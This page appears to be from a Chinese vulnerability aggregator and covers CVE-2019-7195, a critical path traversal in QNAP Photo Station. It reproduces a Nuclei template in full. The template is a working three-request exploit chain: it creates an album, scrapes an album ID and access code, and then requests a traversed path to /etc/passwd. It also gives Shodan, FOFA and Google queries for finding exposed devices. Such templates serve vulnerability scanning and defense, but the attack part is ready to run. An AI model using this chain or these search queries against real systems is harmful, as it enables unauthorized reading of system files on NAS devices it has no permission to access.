CVE-2019-7195: QNAP Photo Station - Path Traversal

日期: 2025-08-01 | 影响软件: QNAP Photo Station | POC: 已公开

漏洞描述

QNAP devices running Photo Station contain an external control of file name or path vulnerability allowing remote attackers to access or modify system files.

PoC代码[已公开]

id: CVE-2019-7195

info:
  name: QNAP Photo Station - Path Traversal
  author: s4e-io
  severity: critical
  description: |
    QNAP devices running Photo Station contain an external control of file name or path vulnerability allowing remote attackers to access or modify system files.
  reference:
    - https://cycrafttechnology.medium.com/qnap-pre-auth-root-rce-affecting-312k-devices-on-the-internet-fc8af285622e
    - https://packetstorm.news/files/id/157857
    - https://github.com/cycraft-corp/cve-2019-7192-check
    - https://github.com/qazbnm456/awesome-cve-poc
    - https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit
    - https://nvd.nist.gov/vuln/detail/CVE-2019-7195
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-7195
    cwe-id: CWE-22
    epss-score: 0.93427
    epss-percentile: 0.99817
    cpe: cpe:2.3:a:qnap:photo_station:*:*:*:*:*:*:*:*
  metadata:
    vendor: qnap
    product: photo_station
    shodan-query:
      - content-length:"580 "http server 1.0""
      - http.title:"photo station"
      - http.title:"qnap"
    fofa-query:
      - title="photo station"
      - title="qnap"
    google-query:
      - intitle:"photo station"
      - intitle:"qnap"
  tags: cve,cve2019,kev,qnap,lfi

http:
  - raw:
      - |
        POST /photo/p/api/album.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        a=setSlideshow&f={{to_lower(rand_text_alpha(5))}}

      - |
        GET /photo/slideshow.php?album={{album_id}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

      - |
        POST /photo/p/api/video.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        album={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

    matchers:
      - type: dsl
        dsl:
          - "status_code_3 == 200"
          - "regex('admin:', body_3)"
          - "contains_all(header_3, 'video/subtitle', 'filename=')"
        condition: and

    extractors:
      - type: regex
        name: album_id
        part: body_1
        group: 1
        regex:
          - '<output>([a-zA-Z]+)<\/output>'
        internal: true

      - type: regex
        name: access_code
        part: body_2
        group: 1
        regex:
          - encodeURIComponent\('([A-Za-z0-9]+)'\)
        internal: true
# digest: 490a00463044022020867e3e26a3e11a20b231b8a46d0ef3d11d5d5cb057fa06b0a21a67138df95d02207e0150b4a9aa6e7f0504ed442ae4b1170b2f30165314f0d0b52b964687ff0369:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2019/CVE-2019-7195.yaml

相关漏洞推荐